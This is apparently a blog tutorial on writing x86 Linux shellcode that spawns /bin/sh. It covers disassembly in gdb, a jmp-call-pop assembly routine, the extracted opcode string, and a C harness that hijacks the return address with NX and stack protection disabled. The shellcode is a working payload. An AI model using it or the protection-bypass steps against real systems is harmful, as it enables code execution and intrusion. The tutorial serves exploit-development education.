Shellcode is a list of carefully crafted instructions(byte code) that can be executed once the code is injected into a running application. It is called "shellcode" because it typically starts a command shell from which the attacker can control the compromised machine, but any piece of code that performs a similar task can be called shellcode.
TestBox : Ubuntu x86 16.04 LTS
So in this post we will write simple shellcode which invoke a shell. Now first we write a program in c to start a shell
#include<stdio.h>
int main() {
char *name[2];
name[0] = "/bin/sh";
name[1] = NULL;
execve(name[0], name, NULL);
}
at above code we use execve() system call to start a shell. execve() execute program pointed by its first argument. The syntax of execve() system call is
int execve(const char *filename, char *const argv[], char *const envp[]);
where the first argument "filename" is pointing to the program to be execute and the second argument "argv" is an array of arguments strings passed to the new program, and third argument "envp" is point to the environment variables passed for new program. And the last two arguments "argv" and "envp" both need to be null terminated. For more info about execve() see man page ('man execve'). Now lets compile the above command
gcc -static -o shell shell.c
'-static' flag is used to add execve() library statically in compiled binary. lets run the program./shell
$
$ exit
Now start gdb, load the compiled binary and disassemble the main routine ajay@box:~/sc$ gdb -q
(gdb) file shell
Reading symbols from /home/ajay/sc/shell...(no debugging symbols found)...done.
(gdb) disas main
Dump of assembler code for function main:
0x08048ee0 <+0>: push %ebp [1]
0x08048ee1 <+1>: mov %esp,%ebp [2]
0x08048ee3 <+3>: and $0xfffffff0,%esp
0x08048ee6 <+6>: sub $0x20,%esp [3]
0x08048ee9 <+9>: movl $0x80c3be8,0x18(%esp) [4]
0x08048ef1 <+17>: movl $0x0,0x1c(%esp) [5]
0x08048ef9 <+25>: mov 0x18(%esp),%eax [6]
0x08048efd <+29>: movl $0x0,0x8(%esp) [7]
0x08048f05 <+37>: lea 0x18(%esp),%edx [8]
0x08048f09 <+41>: mov %edx,0x4(%esp) [9]
0x08048f0d <+45>: mov %eax,(%esp) [10]
0x08048f10 <+48>: call 0x8053a20 <execve> [11]
0x08048f15 <+53>: leave
0x08048f16 <+54>: ret
End of assembler dump.
(gdb)
Now at line [1] and [2] of above disassembly is prolog of the stack, at line [1] ebp is push on the stack, and at line [2] the current esp is copied into the ebp register.at line [3] esp is subtracted by 0x20 or 32, now the stack will look like
at line [4] the address 0x80c3be8 is copied to the 0x18(%esp) which is 24 bytes(0x18) above the current position of esp. The address 0x80c3be8 points to the string "/bin/sh"
(gdb) x/s 0x080c3be8
0x80c3be8: "/bin/sh"
now the stack will beat line [5] a null value is copied to 0x1c(%esp) which is 28 bytes(0x1c) above from current esp
at line [6] the value of block 0x18(%esp) is copied on eax register. Now eax = 0x80c3be8. At line [7] null value is copied to 0x8(%esp), now the stack is
at line [8] the address of block 0x18(%esp) is loaded into the edx register. note 0x18(%esp) contains 0x80c3be8 which is pointer to "/bin/sh" and the instruction 'lea' (Load Effective Address) only copy the address of that block not its value. So edx = address of p{"/bin/sh"}. at line [9] the value of edx is copied on 0x4(%esp)
at line [10] the value of eax register is copied on (%esp)
in line [11] the execve() syscall is called. We know that when a call instruction is performed then the address of next instruction is pushed ono the stack, in this case the address of leave (0x08048f15) is pushed on the stack
and the rest of two instructions are for epilog. After that the program execution flow is controlled by the execve() function. Lets disassemble the execve function
(gdb) disas execve
Dump of assembler code for function execve:
0x08053a20 <+0>: push %ebx [1]
0x08053a21 <+1>: mov 0x10(%esp),%edx [2]
0x08053a25 <+5>: mov 0xc(%esp),%ecx [3]
0x08053a29 <+9>: mov 0x8(%esp),%ebx [4]
0x08053a2d <+13>: mov $0xb,%eax [5]
0x08053a32 <+18>: call *0x80ed5a4 [6]
0x08053a38 <+24>: cmp $0xfffff000,%eax
0x08053a3d <+29>: ja 0x8053a41 <execve+33>
0x08053a3f <+31>: pop %ebx
0x08053a40 <+32>: ret
0x08053a41 <+33>: mov $0xffffffe8,%edx
0x08053a47 <+39>: neg %eax
0x08053a49 <+41>: mov %gs:0x0,%ecx
0x08053a50 <+48>: mov %eax,(%ecx,%edx,1)
0x08053a53 <+51>: or $0xffffffff,%eax
0x08053a56 <+54>: pop %ebx
0x08053a57 <+55>: ret
End of assembler dump.
at line [1] value of ebx register is pushed onto the stackline [2] copy the value of 0x10(%esp) (16 bytes above current esp position) into edx, now EDX = NULL.
Line [3] copy the value of 0xc(%esp) (12 bytes above current esp position) into ecx, now ECX = address of p{"/bin/sh"}
line [4] copy the value of 0x8(%esp) (8 bytes above current esp position) into ebx, now EBX = "/bin/sh"
line [5] put the value 11 in eax which is nothing but the syscall for execve(). EAX = 11
unistd.h file contains the system call numbers
ajay@box:~/sc$ cat /usr/include/i386-linux-gnu/asm/unistd_32.h | grep execve
#define __NR_execve 11
and at line[6] the program called interrupt. Now in order to get shell we need these things# System call 11 in EAX
# String [full path of file to execue] in EBX
# Pointer to the string in ECX
# A Null value in EDX
and then call interrupt. Here is the assembly code
1: .text
2: .globl _start
3: _start:
4: jmp Mycall
5: shellcode:
6: popl %esi
7: xorl %eax, %eax
8: movb %al, 0x7(%esi)
9: movl %esi, 0x8(%esi)
10: movl %eax, 0xc(%esi)
11: movb $11, %al
12: movl %esi, %ebx
13: leal 0x8(%esi), %ecx
14: leal 0xc(%esi), %edx
15: int $0x80
16:
17: Mycall:
18: call shellcode
19: shellvar:
20: .ascii "/bin/shABBBBCCCC"
Explanation of the above code :The program's instructions start at line 4 'jmp Mycall' where execution flow is jump to Mycall lebel, Mycall is defined at line 17. Now in line 18 at 'call shellcode' the code execution again start at line 5, and the next instruction which is define our string and some more space for other values is pushed onto the stack. After that program control goes to line 5.
In line [6] 'popl %esi' pops the saved return address from the stack to ESI register which is nothing but the address of our string. At line [7] 'xorl %eax, %eax' xoring eax with eax, which result to '0' in eax (because it is fast then 'movl 0x0, %eax'). Line [8] copy the value of al register into 0x7(%esi). eax contains Null so it will copy a '0' byte into 0x7(%esi)
line [9] copy the address of esi register into 0x8(%esi) which is nothing but pointer of our string.
line [10] copy doubleword null value into 0xc(%esi)
line [11] copy 11(in bytes) into al register which is the syscall for execve function.
line [12] copy the address of string from esi into ebx. note the ebx only use 7 bytes from 0x0(%esi) because 8th byte is a null value, so it will be terminated.
line [13] loads the effective address of [0x8(%esi)] into ecx which is the pointer to string
line [14] loads the effective address of [0xc(%esi)] into edx which is the null terminater.
Now we have
EAX = 11 [syscall for execve]
EBX = "/bin/sh" (address of string)
ECX = pointer to string
EDX = Null pointer
and at line interrupt is called. So lets compile it and link it.
ajay@box:~/sc$ as -o shellcode.o shellcode.s
ajay@box:~/sc$ ld -o shellcode shellcode.o
then dump the opcodes using objdump ajay@box:~/sc$ objdump -d shellcode
shellcode: file format elf32-i386
Disassembly of section .text:
08048054 <_start>:
8048054: eb 18 jmp 804806e <Mycall>
08048056 <shellcode>:
8048056: 5e pop %esi
8048057: 31 c0 xor %eax,%eax
8048059: 88 46 07 mov %al,0x7(%esi)
804805c: 89 76 08 mov %esi,0x8(%esi)
804805f: 89 46 0c mov %eax,0xc(%esi)
8048062: b0 0b mov $0xb,%al
8048064: 89 f3 mov %esi,%ebx
8048066: 8d 4e 08 lea 0x8(%esi),%ecx
8048069: 8d 56 0c lea 0xc(%esi),%edx
804806c: cd 80 int $0x80
0804806e <Mycall>:
804806e: e8 e3 ff ff ff call 8048056 <shellcode>
08048073 <shellvar>:
8048073: 2f das
8048074: 62 69 6e bound %ebp,0x6e(%ecx)
8048077: 2f das
8048078: 73 68 jae 80480e2 <shellvar+0x6f>
804807a: 41 inc %ecx
804807b: 42 inc %edx
804807c: 42 inc %edx
804807d: 42 inc %edx
804807e: 42 inc %edx
804807f: 43 inc %ebx
8048080: 43 inc %ebx
8048081: 43 inc %ebx
8048082: 43 inc %ebx
now write down the opcodes "\xeb\x18\x5e\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\xb0\x0b\x89\xf3"
"\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
"\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43"
Testing the shellcode:shellrun.c
char shellcode[] = "\xeb\x18\x5e\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\xb0\x0b\x89\xf3"
"\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
"\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43";
int main() {
int *ret;
ret = (int *)&ret + 2;
(*ret) = (int)shellcode;
}
now compile the code with '-z execstack' flag which disable the NX(Non Executable) Protection, otherwise our shellcode would not work. ajay@box:~/sc$ gcc -o shellrun shellrun.c -z execstack -fno-stack-protector
ajay@box:~/sc$ ./shellrun
$
$
our shellcode is successfully worked.At the above code(shellcode.c) we simply define our shellcode as char array. In main function's first instruction 'int *ret;' the stack is look like
now to successfully execute our shellcode we need to overwrite the return address with the address of our shellcode. Now the next instruction "ret = (int *)&ret + 2;" take the address of ret variable and ad 2 int(32bit) or 8 byte value to it and point it on the ret pointer itself. Now the ret variable contains the address of return address[libc_start_main], which is exactly the 8 byte above from current location of ret variable in the stack. The stack will look like this
and the last instruction "(*ret) = (int)shellcode;" will store the address of our shellcode in the place of libc return address.
Now the return address will be shellcode's address. In the above shellcode we can also remove last 9 bytes to shorten our shellcode.
"\xeb\x18\x5e\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\xb0\x0b\x89\xf3"
"\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
"\x68"